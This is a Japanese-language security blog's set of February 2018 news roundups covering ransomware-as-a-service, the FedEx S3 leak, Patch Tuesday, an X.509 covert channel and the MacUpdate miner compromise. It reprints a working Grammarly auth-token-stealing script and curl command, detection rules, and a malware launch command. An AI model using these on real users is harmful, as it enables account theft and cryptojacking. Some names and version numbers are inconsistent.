2018-02-19

2018-02-19 セキュリティニュースまとめ: Saturn RaaS (Ransomeware as a Service) が前金不要で無料のビジネスモデルを採用、GrandCrab ランサムウェアもランサムウェアのアフィリエイトサービス市場に参入

ransomeware ランサムウェアマルウェア malware 情報セキュリティ RaaS Cerber GrandCrab Saturn malspam マルスパム Security bitcoin サイバー犯罪サイバーセキュリティセキュリティビットコインロシアマルバタイジング

Saturn RaaS (Ransomeware as a Service) が前金不要で無料のビジネスモデルを採用、GrandCrab ランサムウェアもランサムウェアのアフィリエイトサービス市場に参入

元記事

www.bleepingcomputer.com

概要

前金不要の新しいビジネスモデル

Saturn という名で呼ばれるランサムウェアをアフィリエイトサービスとして提供するポータルサイトがダークウェブで新たに発見される
これまでの主な RaaS とは異なるビジネスモデルを採用している
- 通常、Cerber などの RaaS では、ランサムウェアの利用にあたり前金が必要だった
- 登録ユーザーが誰でも無料でポータル上で Saturn ランサムウェアを生成でき、身代金の「あがり」の 70% を利用者が、30% をアフィリエイトプログラム提供者が受け取るモデルを採用
- Saturn RaaS は登録ユーザーがポータル上で Saturn ランサムウェアを生成してダウンロード後、ユーザー自身が用意した実行ファイルや Office ファイル、PDF などの文書 (「スタブ」ファイル) にランサムウェアを埋め込み、マルスパムやマルバタイジング経由でばらまくことを想定している
感染した被害者は su34pwhpcafeiztt[.]onion にアクセスして「身代金」を支払う
支払われた身代金はポータルサイト作成者の Bitcoin アカウントに送信され、スタブファイルを生成した登録ユーザーが身代金の 70%、ポータルサイト側が 30% を受け取るようになっている
- 7:3 のモデルは他の Cerber を利用した RaaS ビジネスモデルと同等

ランサムウェア GandCrab も RaaS で提供開始

ペルーのセキュリティリサーチャー David Montenegro 氏が GrandCrab ランサムウェアも RaaS モデルに参入したことを発見
ロシア語を話すユーザーの集う悪名高いフォーラムで売り出されていた

GandCrab Ransomware 28.01.2018 - Thanks to a Cyber criminal who registered your access in his own AZORutl I was able to login in the Underground forum where I found this information about GandCrab Ransomware .. 🧐🧐 .. RaaS GandCrab .. 🕵️‍♂️🕵️‍♂️ pic.twitter.com/INPdatqufr
— David Montenegro (@CryptoInsane) 2018年2月1日

2018-02-18

2018-02-18 セキュリティニュースまとめ: Microsoft Edge にメモリ保護機能 ACG (Arbitrary Code Guard) をバイパス可能な脆弱性

Microsoft Edge web ブラウザ脆弱性 vulnerability Google セキュリティサイバーセキュリティ情報セキュリティ

Microsoft Edge にメモリ保護機能 ACG (Arbitrary Code Guard) をバイパス可能な脆弱性

ソース

概要

Microsoft Edge Web ブラウザは、悪意のあるネイティブコードを実行されないため、次の 2 種類のメモリ保護機能を用意しているが、このうち ACG についてバイパスする方法を Google のセキュリティリサーチャーが発見し Microsoft のセキュリティレスポンスセンターに報告
- Code Integrity Guard (CIG): 適切に署名されたコードのみを実行する
- Arbitrary Code Guard (ACG): コードを動的に生成・変更させない
同脆弱性は 90 日間の猶予期間を経過し、修正が間に合わなかったため公開された
Microsoft 社の見込みでは修正を 2018 年 3 月頃にリリース予定

CVE

TBD (2017 年 8 月の CVE-2017-8637 とは別番号がアサインされると思われるが確認できず)

2018-02-16

2018-02-16 セキュリティニュースまとめ: Amazon S3 にパスワード保護なしで保存されていた FedEx の顧客情報が漏えい

AWS Amazon S3 FedEx フェデックスクラウドクラウドストレージ情報漏えい情報セキュリティ leakage サイバーセキュリティセキュリティサイバー衛生米国設定ミス運輸人為的ミス

Amazon S3 にパスワード保護なしで保存されていた FedEx の顧客情報が漏えい

元記事

www.techrepublic.com

概要

パスワード保護すらない状態で Amazon S3 ストレージサーバー上に FedEx 顧客情報が放置されており、個人の ID カード、履歴書、請求書などが含まれていた
漏えいしたファイル数は 119,000 件以上。ストレージクラウド利用上のサイバー衛生問題が浮き彫りに
クラウドストレージ上に保存したデータをセキュリティへの認識不足が原因で漏えいさせた企業は他にも多数
- ダウ・ジョーンズ、ベライゾン、 Deep Root Analytics
いずれの企業もセキュリティを考慮しない設定ミスが漏えいの原因
最初の報告者は Kromtech 社のセキュリティリサーチャー
クラウド化を推進したいあまり、サービスが提供しているセキュリティ設定やその限界について意識することなく利用してしまう企業が多い

詳細

漏えいを引き起こした会社は 2014 年に FedEx が買収した Bongo という子会社で、発送料を計算するサービスを提供している
漏えいしたファイル数は 119,000 またはそれ以上
発送料を計算するというサービスの性質上、顧客は住所情報に加えて身分証明に関する情報を提供しており、こうした情報がストレージ上に放置されていた
漏えいしたレコードに含まれていた顧客の居住地域は、米国、アジア、オーストラリア、ヨーロッパ、中東
漏えいした情報の修理は運転免許証、勤務先の ID カード、請求書、投票カード、履歴書、保険証、クレジットカード、各国軍関係者の ID カードなど
- 「サンプリングされた軍関係者の ID の情報から、オランダ国防省の上級職員に関する詳細情報を確認できた」
漏えいしたデータの期間は 2008 年～ 2015 年まで
ZDNet から FeDex へ当該インシデントについては連絡がなされ、ただちにデータは保護された
- FedEx は継続調査するむね ZDNet に連絡

2018-02-14

2018-02-14 セキュリティニュースまとめ: Microsoft 月例セキュリティ更新プログラム公開 (Patch Tuesday)、管理者向けに Meltdown / Spectre の影響の評価ツールを配布

Microsoft 月例パッチ Patch Tuesday Meltdown Spectre Intel vulnerability 脆弱性 Adobe ゼロデイ Flash Player CPU Flash IT Security Windows Windows server tools zero-day サイバーセキュリティセキュリティセキュリティアドバイザリソフトウェア更新ツール紹介プロセッサ情報セキュリティ

Microsoft 月例セキュリティ更新プログラム公開 (Patch Tuesday)

ソース

Microsoft February Patch Tuesday Fixes 50 Security Issues https://www.bleepingcomputer.com/news/microsoft/microsoft-february-patch-tuesday-fixes-50-security-issues/
TWO NASTY OUTLOOK BUGS FIXED IN MICROSOFT’S FEB. PATCH TUESDAY UPDATE https://threatpost.com/two-nasty-outlook-bugs-fixed-in-microsofts-feb-patch-tuesday-update/129931/
February 2018 Microsoft (and Adobe) Patch Tuesday https://isc.sans.edu/diary.html
2018 年 2 月のセキュリティ更新プログラム (月例) https://blogs.technet.microsoft.com/jpsecurity/2018/02/14/201802-security-updates/

とくに重要とかんがえられる更新

2018-02-06 に修正・配布された Adobe Flash Player のゼロデイ (すでに攻撃・悪用例が確認されている) が月例でも配布された
Microsoft Outlook のローカルユーザーの権限で任意のコードが実行されうる 2 つの脆弱性が修正された
- 攻撃ベクターがプレビューペインであり、添付ファイルをプレビューしただけで攻撃が実行されることから影響度が「深刻」と区分された
Windows Server 2008 の StructuredQuery に存在するリモートからコードを実行される脆弱性が修正された

Microsoft、管理者向けに Meltdown / Spectre の影響の評価ツールを無料の Windows Analytics サービスに追加して配布

ソース

概要

Microsoft が提供する Windows Analytics サービスに Spectre/Meltdown 脆弱性によって受ける影響を査定するためのツールが加わった
IT 管理者はこのツールを利用することで自組織管理下にある全 Windows デバイスの同脅威からうける影響を包括的把握できる

同ツールにより提供される機能

アンチウイルス (AV) 製品の状態
- AV 製品の種類によっては Windows OS の最新セキュリティ更新と互換性がない場合がある。この機能により、対象デバイス上で稼働する AV 製品が、最新の Windows セキュリティ更新と互換性があるかどうかを確認できる
Windows OS のセキュリティ更新の状態
- Windows Analytics インサイト機能により、Windows のセキュリティ更新が対象デバイス上で稼働しているかどうか、無効化されている更新がないかどうかを確認できる。IT 管理者は、セキュリティ更新をインストールした後、修正は無効化するよう設定することも可能。
ファームウェアの状態
- 本インサイトにより、デバイスにインストールされているファームウェアの詳細を把握することができる。インストール済みファームウェアになんらかの保護が必要かどうかを調べる用途に適している。最初は対応している CPU (チップセット) は Intel が承認済みかつ公開済みのファームウェア一覧に限られるが、今後他のパートナーからもデータが出揃いしだい対象を拡大予定。

2018-02-06

2018-02-06: セキュリティニュースまとめ: Chrome 機能拡張「Grammerly」に全 web サイトに対し Auth トークンをアクセス可能にする脆弱性

プラグイン Chrome Grammerly アドオン機能拡張脆弱性 Auth トークン情報漏えい Mozilla Google web ブラウザ情報セキュリティセキュリティ

一次ソース

1527 - Grammarly: auth tokens are accessible to all websites - project-zero - Monorail

Grammerly Chrome 機能拡張について: 参考情報

lifeiscolourful.hatenablog.com

grammerly.com は英文ファイルをアップロードすると文法チェックしてくれるサービス
Chrome 機能拡張を利用すると、別のサイトでリアルタイムに執筆中の英文の文法チェックをしてくれる
- 例: 任意のサイトに英文を入力中、Chrome 機能拡張でリアルタイムに文法間違いを指摘するなど
Grammerly Chrome 機能拡張のユーザー数: 約 2200 万人

確認された問題

発見日: 2018-02-02
修正確認日: 2018-02-06
Grammerly 機能拡張は Auth トークンを全 web サイトに晒している
- すべての web サイトが当該 Auth トークンのユーザーとして grammerly.com にログインでき、当該ユーザーのすべてのドキュメント、履歴、ログ、そのほかのデータにアクセスできる
- 例えばある web サイト A に英文を入力中、同サイト A は Auth トークンを利用し gammerly.com の当該ユーザアカウントのすべてのデータにアクセスできる

再現方法

任意の web サイト (例えば example.com) 上で Chrome のデベロッパーツールにアクセスし、コンソールに下記を入力して grammerly の auth トークンを取得すれば良い。ここではコンソールからスクリプトを入力しているが、実際にはその web サイトの script セクションに同じスクリプトを仕掛けておけばユーザによる入力は必要ない。

> document.body.contentEditable=true // Trigger grammarly
> document.querySelector("[data-action=editor]").click() // Click the editor button
> document.querySelector("iframe.gr_-ifr").contentWindow.addEventListener("message", function (a) { console.log(a.data.user.email, a.data.user.grauth); }) // log auth token and email
> window.postMessage({grammarly: 1, action: "user" }, "*") // Request user data

これにより以下のようなアウトプットが得られる。

testaccount.zzxxyyaa@gmail.com AABEnOZHVclnIAvUTKa4yc1waRRf59-hY3dVDT0gvrDfcJDAFt3Nlq84LpWFpzH1tkxzqs

grauth トークンは gammerly.com で利用されている grauth クッキーと合致しており grammerly.com アカウントのログインするのに十分な情報である。これで Grammerly ユーザーのアカウントにあるすべての文書にアクセスできる。

たとえば以下の curl コマンドでアップロードされている全ドキュメントを取得できる。

$ curl --cookie "grauth=AABEnOZHVclnIAvUTKa4yc1waRRf59-hY3dVDT0gvrDfcJDAFt3Nlq84LpWFpzH1tkxzqs;" -A Mozilla -si 'https://dox.grammarly.com/documents?search=&limit=100&firstCall=false'
HTTP/2 200
date: Fri, 02 Feb 2018 20:42:51 GMT
content-type: application/json;charset=utf-8
content-length: 438
server: nginx-clojure/0.4.5
x-xss-protection: 1; mode=block
x-frame-options: DENY
x-request-id: 1-5a74cd4b-1d54e8fe06dc94f47361216e
x-content-type-options: nosniff
content-security-policy: default-src 'none'
strict-transport-security: max-age=31536000
vary: Accept-Encoding, User-Agent

[{"id":260704145,"user_id":704607600,"title":"Demo document","size":3301,"first_content":"Remember when you were a careless eight year old kid riding a bike with your friends,racing each other around the neighborhood? Remember that feeling of absolute freedom as you felt the wind in your hair and the smile it put on your face? I never thought ","errors":41,"created_at":"2018-02-02T19:20:37.693","updated_at":"2018-02-02T19:21:04.268"}]

修正

Grammerly は当該報告を受けただちにパッチをリリース済み (2018-02-06)
- Grammerly は報告から 90 日以内の修正を求められたが 3 日間で修正版をリリース、非常に短期間で修正を行った
Chrome および Mozilla の両方の更新が確認されている

2018-02-06

2018-02-06 セキュリティニュースまとめ: X.509 デジタル証明書を秘密の通信路として悪用する方法が確認される

Suricata YARA ルール IDS X.509 デジタル証明書秘密の通信路 C2 C&C コマンド & コントロール論文攻撃手法情報セキュリティセキュリティサイバーセキュリティ

X.509 デジタル証明書を秘密の通信路として悪用する方法が確認される

一次ソース: Fidelis Cybersecurity

www.fidelissecurity.com

同社リサーチャーによる論文

Covert channel by abusing x509 extensions

本件に関する PoC (Github)

GitHub - fideliscyber/x509: Proof of concept framework for transferring a file over x509 extension covert channel

参考情報

3.3.6 X.509証明書の拡張領域

概要

すでに侵害を受けた組織内から外部の C2 サーバーへ秘密の通信を行う方法として、X.509 デジタル証明書の拡張領域を悪用する方法が確認された
TLS ハンドシェイク中、X.509 デジタル証明書の拡張領域を使って C2 サーバー宛のデータを送信することにより実際には TLS セッションを張らなくても C2 サーバーとデータを交換することができる
証明書に含まれる値を検査しないセキュリティ対策はバイパスされてしまう可能性がある
Mimikatz を使った PoC
この方法を利用する攻撃例の検知用 YARA ルールサンプルと YARA ルールを元にした Suricata の IDS Alert ルールサンプル

YARA ルールのサンプル

拡張領域の subjectKeyIdentifier (主体者鍵識別子) を利用した攻撃で 127 バイトより長い値をもつ主体者鍵識別子を検出する

rule abnormal_subjectkeyid
{ 
meta:
author = "Jason Reaves"
strings: 
$shortlens = /\x06\x03\x55\x1d\x0e\x04.\x04[^\x08\x10\x14\x20\x30\x40]/
$longlens = {06 03 55 1d 0e 04 8?}
condition:
any of them
}

Suricata IDS アラートのルールサンプル

拡張領域の subjectKeyIdentifier (主体者鍵識別子) を利用した攻撃で 127 バイトより長い値をもつ主体者鍵識別子を検出する YARA ルールを Suricata のルールに変換

alert tcp any any -> any any ( msg:"Abnormal x509v3 SubjectKeyIdentifier extension"; dsize:>768;
content: "|16 03|"; depth:2; content:"|06 03 55 1d 0e 04|"; offset:0x150;
pcre:"/\x06\x03\x55\x1d\x0e\x04.\x04[^\x08\x10\x14\x20\x30\x40]/"; classtype:misc-attack;
sid:1000001; rev:1;)

まとめ

C2 サーバーへの秘密の通信路として X.509 の拡張領域を利用すると、ネットワーク境界に配備したセキュリティ機能が検出できない場合がある
標準から逸脱したデジタル証明書を検出することで、こうした秘密の通信路を検出しうる

2018-02-04

2018-02-04: セキュリティニュースまとめ: ソフトウェアダウンロードアグレゲーションサービスサイト MacUpdate で侵害、Monero マイナー入りアプリケーションが配信される

マルウェア仮想通貨暗号通貨 Monero マイナーマイニング採掘スクリプト情報セキュリティセキュリティ Mac Adobe FireFox ダウンロードアグレゲーションソフトウェア更新配信 Mac OS Mozilla Security cryptocurrency サイバーセキュリティサイバー犯罪攻撃手法

ソフトウェアダウンロードアグレゲーションサービスサイト MacUpdate で侵害、Monero マイナー入りアプリケーションが配信される

元記事 MalwwareBytes Labs

blog.malwarebytes.com

概要

インシデントの確認日: 2018-02-01
MacUpdate がセキュリティ侵害を受け、同サービスが配信するソフトウェアに暗号通貨 Monero の採掘 (マイニング) 用スクリプトが埋め込まれて配信される
MacUpdate は正規のソフトウェアデベロッパの配信サービスを取りまとめて一覧表示するいわゆる「ダウンロードアグレゲーション」サービスを提供しているサイト

発生した侵害内容

MacUpdate サイトが参照する各正規サイトの URL が書き換えられ、悪意のあるソフトウェアがダウンロードされる

正規ドメイン	偽ドメイン
titanium-software.fr	titaniumsoftware[.]org
mozilla.net	cdn-mozilla[.]net

同サービスから配信された感染アプリケーション

OnyX (Titanium Software)
Deeper (Titanium Software)
FireFox 58.0.2 (Mozilla)

感染機序

侵害を受けたサイト上でユーザーが偽ドメインを開き、ユーザーがダウンロードしようとしたソフトウェア(以降この正規ソフトウェア部分を指して「おとり」)を同梱した感染済みソフトウェア(以降この部分を指して「悪意のあるスクリプト」)をダウンロード
「悪意のあるスクリプト」は「おとり」に似せて作られた *.dmg ファイルで、自身をアプリケーションフォルダにドラッグ & ドロップしてインストールするようユーザーに促す
ユーザーがインストールした「悪意のあるスクリプト」を開くとマルウェアのペイロードが Adobe が保有する正規ドメインの public.adobecc.com からダウンロードされる
「悪意のあるスクリプト」は続いて同梱していた「おとり」を開き、ユーザーがダウンロードしたつもりの正規ソフトウェアが正常に起動されたように装う
「悪意のあるスクリプト」はダウンロードしたマルウェアのペイロードをユーザーの /Library フォルダ以下に展開し、MacOSupdate.plist というファイルをインストールして定期的にこのスクリプトを実行させるためのローンチエージェントを登録する
MacOSupdate.plist が実行されると、新しい MacOS.plist がダウンロードされて MacOSupdate.plist に置換される
MacOS.plist が悪意のある sysmdworker プロセスをロードする:

sh -c ~/Library/mdworker/sysmdworker -user walker18[@]protonmail.ch -xmr

sysmdworker が Monero のマイニングを行うマルウェア本体で、minergate-cli というコマンドラインツールで採掘を行い、定期的に minergate[.]com に、上記の引数に指定されているメールアドレス walker18[@]protonmail.ch でログインする

本マルウェアの特徴

感染 Onyx の動作要件は MacOS 10.7 とそれ以降だが、正規の Onyx は MacOS 10.13 以降でのみ動作する。したがって MacOS 10.7 より新しく MacOS 10.13 より古いシステム上で感染した Onyx をインストールして実行した場合、マルウェア部分のみが起動するものの「おとり」部分が起動できない。これにより、MacOS 10.3 より古いシステムを利用しているユーザーは、ソフトウェアに問題が発生していることに気づくチャンスがある。
感染 Deeper の場合、攻撃者は同梱ソフトウェアを間違え、おとり部分に Deeper の代わりに Onyx を同梱してしまっている。このため、Deeper をインストールしたら Onyx が起動する結果となる。やはりここでも問題が発生していることに気づくチャンスがある。

まとめ

ダウンロードアグレゲーションサービスは利用しない。正規サイトが侵害されないわけではないが、アグレゲーションサイトは格段に侵害リスクが高い。こうしたサービス提供者自身がマルウェアやアドウェアなどを正規ソフトウェアに同梱する場合もあるし、セキュリティ上の問題が多い。
正規のソフトウェア開発者からダウンロードする場合でも、ソフトウェアの評価やレビュー数を常に意識する。極端に評価の低いソフトウェアやレビュー数の少ないソフトウェアを利用しない。
ダウンロードしたソフトウェアが起動しない、CPU 使用率が 100% に張り付いたままになるなど意図したように動作しない状況に気づいたら何か問題が発生している可能性があると疑い、システム全体をセキュリティソフトウェアでスキャンする
最後に「Mac はウイルスに感染しない」という馬鹿げた都市伝説を信じてはいけない